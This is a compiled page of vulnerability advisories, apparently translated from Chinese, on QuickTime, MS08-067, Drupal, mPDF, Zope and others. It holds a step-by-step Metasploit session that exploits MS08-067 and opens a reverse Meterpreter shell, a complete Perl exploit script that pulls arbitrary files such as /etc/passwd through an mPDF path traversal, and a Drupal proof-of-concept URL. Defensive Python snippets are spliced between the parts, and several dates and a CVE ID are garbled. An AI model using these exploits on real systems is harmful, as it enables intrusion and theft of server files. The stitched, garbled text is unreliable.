
Apple QuickTime Information Disclosure Vulnerability (Vulnerability Advisory)

Posted: 2022-08-04 07:43:59

Below is the editor's compilation of advisories on the Apple QuickTime information disclosure vulnerability, 9 articles in total; we hope you find them useful.


Part 1: Apple QuickTime Information Disclosure Vulnerability (Vulnerability Advisory)

Release date: -10-28

Update date: 2011-10-28

Affected systems:

Apple QuickTime Player 7.x

Unaffected systems:

Apple QuickTime Player 7.7.1

Description:

--------------------------------------------------------------------------------

BUGTRAQ ID: 50130

CVE ID: CVE-2011-3220

QuickTime is a multimedia framework developed by Apple that handles many digital video, media clip, audio, text, animation and music formats, as well as several kinds of interactive panoramic images.

Apple QuickTime has an uninitialized memory access issue in the URL data handler used when processing video files; an attacker can exploit this to read memory contents.

<*Source: Luigi Auriemma (aluigi@pivx.com)

Link: support.apple.com/kb/HT5016

*>

Recommendations:

--------------------------------------------------------------------------------

Vendor patch:

Apple

-----

The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page:

support.apple.com/

Part 2: MS08-067 Vulnerability (Vulnerability Advisory)

This vulnerability has been exposed for a long time. I won't explain the principle here (I don't understand it myself), so I'll just run it directly with Metasploit. Experts, please skip this.

root@bt:~# genlist -s 10.10.10.*

10.10.10.1

10.10.10.2

10.10.10.128

10.10.10.130

10.10.10.254

root@bt:~# nmap -sS -Pn 10.10.10.128

Starting Nmap 6.01 ( nmap.org ) at -04-23 01:49 EDT

Nmap scan report for attacker.dvssc.com (10.10.10.128)

Host is up (0.0000060s latency).

All 1000 scanned ports on attacker.dvssc.com (10.10.10.128) are closed

Nmap done: 1 IP address (1 host up) scanned in 0.08 seconds

root@bt:~# nmap -sS -Pn 10.10.10.130

Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT

Nmap scan report for service.dvssc.com (10.10.10.130)

Host is up (0.011s latency).

Not shown: 985 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

777/tcp open multiling-http

1025/tcp open NFS-or-IIS

1026/tcp open LSA-or-nterm

1027/tcp open IIS

1030/tcp open iad1

1521/tcp open oracle

6002/tcp open X11:2

7001/tcp open afs3-callback

7002/tcp open afs3-prserver

8099/tcp open unknown

MAC Address: 00:0C:29:D3:08:A0 (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.21 seconds

root@bt:~#

root@bt:~# nmap --script=smb-check-vulns 10.10.10.130

Starting Nmap 6.01 ( nmap.org ) at 2014-04-23 01:50 EDT

Nmap scan report for service.dvssc.com (10.10.10.130)

Host is up (0.00032s latency).

Not shown: 985 closed ports

PORT STATE SERVICE

21/tcp open ftp

80/tcp open http

135/tcp open msrpc

139/tcp open netbios-ssn

445/tcp open microsoft-ds

777/tcp open multiling-http

1025/tcp open NFS-or-IIS

1026/tcp open LSA-or-nterm

1027/tcp open IIS

1030/tcp open iad1

1521/tcp open oracle

6002/tcp open X11:2

7001/tcp open afs3-callback

7002/tcp open afs3-prserver

8099/tcp open unknown

MAC Address: 00:0C:29:D3:08:A0 (VMware)

Host script results:

| smb-check-vulns:

| MS08-067: VULNERABLE

| Conficker: Likely CLEAN

| regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)

| SMBv2 DoS (CVE--3103): CHECK DISABLED (add '--script-args=unsafe=1' to run)

| MS06-025: CHECK DISABLED (remove 'safe=1' argument to run)

|_ MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)

Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds

root@bt:~# msfconsole

Call trans opt: received. 2-19-98 13:24:18 REC:Loc

Trace program: running

wake up, Neo...

the matrix has you

follow the white rabbit.

knock, knock, Neo.


=[ metasploit v4.5.0-dev [core:4.5 api:1.0]

+ -- --=[ 927 exploits - 499 auxiliary - 151 post

+ -- --=[ 251 payloads - 28 encoders - 8 nops

msf > search ms08_067

Matching Modules

================

Name Disclosure Date Rank Description

---- --------------- ---- -----------

exploit/windows/smb/ms08_067_netapi -10-28 00:00:00 UTC great Microsoft Server Service Relative Path Stack Corruption

msf > use exploit/windows/smb/ms08_067_netapi

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Exploit target:

Id Name

-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) > set RHOST 10.10.10.130

RHOST => 10.10.10.130

msf exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/reverse_tcp

PAYLOAD => windows/meterpreter/reverse_tcp

msf exploit(ms08_067_netapi) > show options

Module options (exploit/windows/smb/ms08_067_netapi):

Name Current Setting Required Description

---- --------------- -------- -----------

RHOST 10.10.10.130 yes The target address

RPORT 445 yes Set the SMB service port

SMBPIPE BROWSER yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows/meterpreter/reverse_tcp):

Name Current Setting Required Description

---- --------------- -------- -----------

EXITFUNC thread yes Exit technique: seh, thread, process, none

LHOST yes The listen address

LPORT 4444 yes The listen port

Exploit target:

Id Name

-- ----

0 Automatic Targeting

msf exploit(ms08_067_netapi) > set LHOST 10.10.10.128

LHOST => 10.10.10.128

msf exploit(ms08_067_netapi) > exploit

[*] Started reverse handler on 10.10.10.128:4444

[*] Automatically detecting the target...

[*] Fingerprint: Windows - No Service Pack - lang:Unknown

[*] Selected Target: Windows 2003 SP0 Universal

[*] Attempting to trigger the vulnerability...

[*] Sending stage (752128 bytes) to 10.10.10.130

[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.130:3722) at 2014-04-23 01:53:59 -0400
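From a defender's side, the useful artefact in the session above is the smb-check-vulns block, which tells you which hosts still need the MS08-067 patch. The following parser, an added example and not part of the original post, reads Nmap output in that layout (the sample is constructed to mirror the scan above) and returns the hosts with a check reported VULNERABLE:

```python
import re
from typing import Dict, List

# Constructed sample in the layout Nmap's smb-check-vulns script prints
# (same shape as the scan of 10.10.10.130 above).
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for service.dvssc.com (10.10.10.130)
Host script results:
| smb-check-vulns:
|   MS08-067: VULNERABLE
|   Conficker: Likely CLEAN
|   regsvc DoS: CHECK DISABLED (add '--script-args=unsafe=1' to run)
|_  MS07-029: CHECK DISABLED (remove 'safe=1' argument to run)
Nmap done: 1 IP address (1 host up) scanned in 0.56 seconds
"""

HOST_RE = re.compile(r"^Nmap scan report for (?:\S+ )?\(?([\d.]+)\)?")  # "for host (ip)" or "for ip"
CHECK_RE = re.compile(r"^\|_?\s+([^:]+):\s+(.*)$")  # "|   MS08-067: VULNERABLE"; "|_" = last line

def parse_smb_check_vulns(text: str) -> Dict[str, Dict[str, str]]:
    """Return {host_ip: {check_name: status}} for each host whose scan
    output contains an smb-check-vulns block."""
    results, host, in_block = {}, None, False
    for line in text.splitlines():
        m = HOST_RE.match(line)
        if m:
            host, in_block = m.group(1), False
            continue
        if host and line.startswith("| smb-check-vulns:"):
            in_block = True
            results.setdefault(host, {})
            continue
        if in_block:
            m = CHECK_RE.match(line)
            if not m:                  # block ended without the "|_" marker
                in_block = False
                continue
            results[host][m.group(1).strip()] = m.group(2).strip()
            if line.startswith("|_"):  # "|_" marks the block's last line
                in_block = False
    return results

def vulnerable_hosts(text: str) -> Dict[str, List[str]]:
    """Hosts to patch first, each with the checks that reported VULNERABLE."""
    return {host: [c for c, s in checks.items() if s.startswith("VULNERABLE")]
            for host, checks in parse_smb_check_vulns(text).items()
            if any(s.startswith("VULNERABLE") for s in checks.values())}
```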

Part 3: XSIO Vulnerability (Vulnerability Advisory)

Author: aullik5

Original source: hi.baidu.com/aullik5/blog ... a02c6785352416.html

The vulnerability I'm going to talk about today is a very sneaky one. Most websites have it, not just Baidu.

What is XSIO, and why call it sneaky?

XSIO arises because the position property of an image is not restricted (absolute is allowed), so an image can be made to appear at any position on the page.

That image can then be used to cover any spot on the page, including the site banner, a link or a button.

This can deface the page, and once the image is given a link it obviously serves as a phishing lure.

XSIO vulnerability:

Because ordinary HTML tags are not filtered, these tags can be used to carry out an XSIO attack. On Baidu, a blog post is rendered inside a table, so the table has to be closed first and then a suitable image inserted.

For example, the following code:

Code:

By controlling the left and top values we can place this image over any position on the page, while the link points to www.ph4nt0m.org.

[Image: 百度.jpg (40.08 KB), 2008-10-21 20:50]

As the picture shows: I covered the banner area with the anonymous user's avatar.

In an actual attack, an image can be used to cover a link or banner; when someone clicks what was originally the link or button, they are taken to our malicious site instead.

So this is a very sneaky vulnerability!

To find out what happens next, wait for the next installment!

PS: This activity is purely personal and unrelated to any organization or group.

Starting tomorrow, we begin our XSS journey.
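The mitigation the post points at is to stop user-supplied markup from positioning elements over the rest of the page. The sanitizer below is an added example, not code from the post: it strips inline-style declarations that take an element out of normal flow (position:absolute/fixed/sticky, offsets, z-index, transform) and leaves harmless styling intact. The sample post is constructed.

```python
import re

# Declarations that pull an element out of normal flow and let it cover
# other parts of the page; dropping them is the XSIO mitigation.
DROPPED_PROPERTIES = {"top", "left", "right", "bottom", "z-index", "transform"}
ALLOWED_POSITION = {"static", "relative"}   # absolute/fixed/sticky are refused

# style="..." or style='...' attributes inside user-supplied HTML
STYLE_ATTR_RE = re.compile(r"""\sstyle\s*=\s*(?:"([^"]*)"|'([^']*)')""", re.I)

def sanitize_style(style: str) -> str:
    """Keep only declarations that cannot move the element over other content."""
    kept = []
    for decl in style.split(";"):
        if ":" not in decl:
            continue
        prop, value = decl.split(":", 1)
        prop, value = prop.strip().lower(), value.strip()
        if prop in DROPPED_PROPERTIES:
            continue
        if prop == "position" and value.lower() not in ALLOWED_POSITION:
            continue
        kept.append(f"{prop}: {value}")
    return "; ".join(kept)

def sanitize_html(html: str) -> str:
    """Rewrite every inline style through sanitize_style; drop the attribute
    entirely when nothing safe remains."""
    def repl(m):
        raw = m.group(1) if m.group(1) is not None else m.group(2)
        cleaned = sanitize_style(raw)
        return f' style="{cleaned}"' if cleaned else ""
    return STYLE_ATTR_RE.sub(repl, html)

# Constructed sample: an avatar the post author tries to float over the banner.
USER_POST = ('<img src="avatar.jpg" style="position:absolute; left:0; top:0; z-index:99">'
             '<img src="photo.jpg" style="width:120px; border:1px solid #ccc">')
```

Closing the surrounding table (the other half of the trick described above) is a tag-balancing problem for the same sanitizer, not an inline-style one.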

Part 4: DeepSoft.com.sys.Servlet Upload Vulnerability (Vulnerability Advisory)

Author: hackdn

Note

A JSP+MSSQL system that is widely used abroad. The flaw is in the registration upload: filtering is lax, so modifying the POST below lets a JSP be uploaded.

Photo to upload:

There is no limit on file size; only *.ai and *.psd files may fail to display after upload.

Part 5: Drupal 7.14 <= Full Path Disclosure (Vulnerability Advisory)

Drupal 7.14 <= Full Path Disclosure Vulnerability

About Drupal:

"Drupal is an open source content management platform powering millions of websites and
applications. It's built, used, and supported by an active and diverse community of people
around the world."

Drupal is used by common companies like Ing/Diba, Amnesty International and The White House.

Issue: Full Path Disclosure

Risk level: Medium

The remote attacker has the possibility to detect the full local path of drupal.
This information can be used for processing further attacks against the server.

In includes/bootstrap.inc, line 2695:

-------------------------------------
function request_path() {
  static $path;

  if (isset($path)) {
    return $path;
  }

  if (isset($_GET['q'])) {
    // This is a request with a ?q=foo/bar query string. $_GET['q'] is
    // overwritten in drupal_path_initialize(), but request_path() is called
    // very early in the bootstrap process, so the original value is saved in
    // $path and returned in later calls.
    $path = $_GET['q'];
  }
  elseif (isset($_SERVER['REQUEST_URI'])) {
    // This request is either a clean URL, or 'index.php', or nonsense.
    // Extract the path from REQUEST_URI.
    $request_path = strtok($_SERVER['REQUEST_URI'], '?');
    $base_path_len = strlen(rtrim(dirname($_SERVER['SCRIPT_NAME']), '/'));
    // Unescape and strip $base_path prefix, leaving q without a leading slash.
    $path = substr(urldecode($request_path), $base_path_len + 1);
    // If the path equals the script filename, either because 'index.php' was
    // explicitly provided in the URL, or because the server added it to
    // $_SERVER['REQUEST_URI'] even when it wasn't provided in the URL (some
    // versions of Microsoft IIS do this), the front page should be served.
    if ($path == basename($_SERVER['PHP_SELF'])) {
      $path = '';
    }
  }
  else {
    // This is the front page.
    $path = '';
  }

  // Under certain conditions Apache's RewriteRule directive prepends the value
  // assigned to $_GET['q'] with a slash. Moreover we can always have a trailing
  // slash in place, hence we need to normalize $_GET['q'].
  $path = trim($path, '/');
  return $path;
}
-------------------------------------

Exploit / Proof Of Concept:

www.xxx.com /?q[]=x

-------------------------------------

Fix:

Search for:

$path = trim($path, '/');

And add the following line above it:

if (is_array($path)) { die(); }

-------------------------------------

Part 6: mPDF <= 5.3 File Disclosure and Fix (Vulnerability Advisory)

Title: mPDF <= 5.3 File Disclosure

Author: ZadYree

Download: www.mpdf1.com/mpdf/download

Affected versions: 5.3 and prior

Tested platforms: multiple

#!/usr/bin/perl -U

=head1 TITLE

mPDF <= 5.3 File Disclosure Exploit (0day)

=head2 SYNOPSIS

-- examples/show_code.php --

preg_match('/example[0]{0,1}(\d+)_(.*?).php/',$filename,$m); <--- URI improperly filtered.
$num = intval($m[1]);
$title = ucfirst(preg_replace('/_/',' ',$m[2]));
if (!$num || !$title) { die("Invalid file"); }

=head2 DESCRIPTION

This vulnerability, due to a weak filter, lets you download any unprotected remote
content, under PDF format.

The exploit may not work, depending on the set up htaccess/chmod rules on the
remote server.

=head2 USAGE

perl exploit.pl -r www.2cto.com /mpdf53/ ../config.php
perl exploit.pl -a p00niez.com/mpdf53/ /etc/passwd

Required modules:

PDF::OCR2
LWP::Simple
File::Type

Download a module:

sudo cpan -fi install Module::Name

=head3 Author

Zadyree ~ 3LRVS Team | Blog: z4d.tuxfamily.org/blog

=head3 Thanks

PHDays CTF - Yes, CTFs sometime do give you 0dayz
3LRVS Team - Support

=cut

#************* Configuration **************#
my $pdf_file = '/tmp/b00m.pdf';
$PDF::OCR2::CHECK_PDF = 0;
$del_temp_file = 1;
#******************************************#

use 5.010;
use PDF::OCR2;
use Getopt::Std;
use LWP::Simple;
use File::Type;
use constant TRUE => 1;
use constant FALSE => 0;

help() unless (@ARGV >= 2);

my (%optz, $uri);
getopts('rah', \%optz);   # getopts needs a hash reference
my $relative = $optz{'r'};
my $absolute = $optz{'a'};
my $help = $optz{'h'};
help() if ($help);
help() unless ($absolute || $relative);

my ($purl, $fpath) = @ARGV;
my $name = $purl;
$name =~ s{(.+?)/.*}{$1};
$name .= ("_" . localtime(time) . ".txt");

$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../../../../../../../' if ($absolute);
$uri = '/examples/show_code.php?filename=example03_LRVS.php/../../' if ($relative);
help() unless ($uri);

my $furl = $purl . $uri . $fpath;
$furl =~ s#(//)#$i++?"/":$1#eg; # Yeah that's twisted.

say "[*]Retrieving content...";
my $file = make_file(get($furl));
die "[-]The stream you requested is not well formatted (forbidden page, etc).\n" unless is_pdf($file);
say "[+]OK\n[*]Converting format...";
$pdf = PDF::OCR2->new($file);
my $text = $pdf->text;
$text =~ s/[^\x0A-\x7F]+?//gm;   # keep printable ASCII and newlines only

open(my $fh, '>', $name);
print $fh $text;
close($fh);
say "[+]OK\n[+]Content successfully extracted!\nFile: ", $name;
unlink($pdf_file) if ($del_temp_file == TRUE);

# Write the fetched body to the temporary PDF path and return that path.
sub make_file {
    my $content = shift;
    open($fh, '>', $pdf_file);
    print $fh $content;
    close($fh);
    return($pdf_file);
}

# True when the downloaded file really carries a PDF MIME type.
sub is_pdf {
    my $checked_file = shift;
    my $ft = File::Type->new();
    return(1) if ($ft->mime_type($checked_file) eq "application/pdf");
    return(0);
}

sub help {
    say <<"EOF";
Usage: perl $0 [-r|-a] [mPDF URL]

Details:
-r : Relative path (ex: ../file.php)
-a : Absolute path (ex: /etc/file.zd)

For any more information, feel free to contact ZadYree
Happy hacking!
EOF
    exit(0);
}
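The root cause in the SYNOPSIS above is that preg_match only requires the pattern to occur somewhere in $filename, so anything appended after the matching "exampleNN_title.php" prefix passes. The following added example (not mPDF's own code; the examples directory path is an assumption) transcribes that weak check to Python beside a hardened version that anchors the pattern and confirms the resolved path stays inside the examples directory:

```python
import posixpath
import re

# The page's weak filter from examples/show_code.php, transcribed to Python:
#   preg_match('/example[0]{0,1}(\d+)_(.*?).php/', $filename, $m)
WEAK_RE = re.compile(r"example[0]{0,1}(\d+)_(.*?).php")
# Hardened pattern: anchored, no path separators, literal ".php" suffix.
STRICT_RE = re.compile(r"^example0?(\d+)_([A-Za-z0-9_]+)\.php$")
EXAMPLES_DIR = "/var/www/mpdf/examples"   # assumed install path (constructed)

def weak_filter_accepts(filename: str) -> bool:
    """Mirror of the original check: the pattern only has to occur somewhere
    in the string, so "example03_x.php/../../config.php" is not rejected."""
    m = WEAK_RE.search(filename)
    if not m:
        return False
    num = int(m.group(1))                      # intval($m[1])
    title = m.group(2).replace("_", " ")       # preg_replace('/_/', ' ', $m[2])
    return bool(num) and bool(title)           # if (!$num || !$title) die()

def strict_filter_accepts(filename: str, base_dir: str = EXAMPLES_DIR) -> bool:
    """Hardened check: the whole name must match, the example number must be
    non-zero, and the normalized path must be a direct child of base_dir."""
    m = STRICT_RE.fullmatch(filename)
    if not m or int(m.group(1)) == 0:
        return False
    target = posixpath.normpath(posixpath.join(base_dir, filename))
    return posixpath.dirname(target) == posixpath.normpath(base_dir)
```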

Part 7: MolyXBoard Source Code Disclosure Vulnerability

Preface

MolyXBoard (MXB below) is a PHP forum program developed by the MolyXStudios group (apparently the same as the CNVBB group). MXB combines the strengths of many forum programs, is feature-rich, and years of experience localizing and improving forum software have made it well suited to Chinese users' habits. Vulnerabilities, however, are unavoidable.

Affected systems

MolyXBoard 2.0

MolyXBoard 2.1

Details

attachment.php does not check the attach variable, so a remote attacker can craft this variable to access any existing file on the server that the process is permitted to read.

A section of the file's code:

function showattachment()
{
    global $DB, $forums, $_INPUT, $bbuserinfo, $bboptions;
    $forums->noheader = 1;
    if (!$_INPUT[

Part 8: 2Bgal admin/phpinfo.php Script Information Disclosure Vulnerability

Affected versions:

2Bgal 3.1.2

Program description:

2BGal is a PHP/MySQL script for publishing photos and albums.

Vulnerability analysis:

The call to the phpinfo function in 2BGal's admin/phpinfo.php script is publicly accessible; a remote attacker can disclose the PHP configuration by requesting the file directly.

Solution:

Vendor patch:

Ben3w

-----

The vendor has released an upgrade patch to fix this security issue; please download it from the vendor's home page:

www.ben3w.com/multimedia/devphp_2bgal.php

Source:

<*Source: NoGe (jong_amq@hotmail.com)

Link: secunia.com/advisories/35586/

*>

Part 9: Zope CSVTable Remote File Information Disclosure Vulnerability

Affected systems:

Debian Linux 3.1

Zope Zope 2.8.8

Zope Zope 2.7.5

Description:

BUGTRAQ ID: 20022

CVE(CAN) ID: CVE-2006-4684

Zope is an open-source content management system server based on Python.

Zope has a vulnerability in its handling of web page markup that a remote attacker could exploit to access files without authorization.

Zope does not disable the csv_table directive in web pages that contain ReST markup, which discloses files readable by the Zope server.

<*Source: Debian Advisory

Link: www.debian.org/security/2005/dsa-1176

*>

Recommendations:

Vendor patch:

Debian

------

Debian has released a security advisory (DSA-1176-1) and corresponding patches for this issue:

DSA-1176-1: New zope2.7 packages fix information disclosure

Link: www.debian.org/security/2005/dsa-1176

Patch download:


Patch installation:

1. Install the patch package manually:

First, download the patch with the following command:

# wget url  (url is the patch download link)

Then install it with the following command:

# dpkg -i file.deb (file is the name of the corresponding patch package)

2. Install the patch package automatically with apt-get:

First, update the local package database:

# apt-get update

Then install the updated packages:

# apt-get upgrade
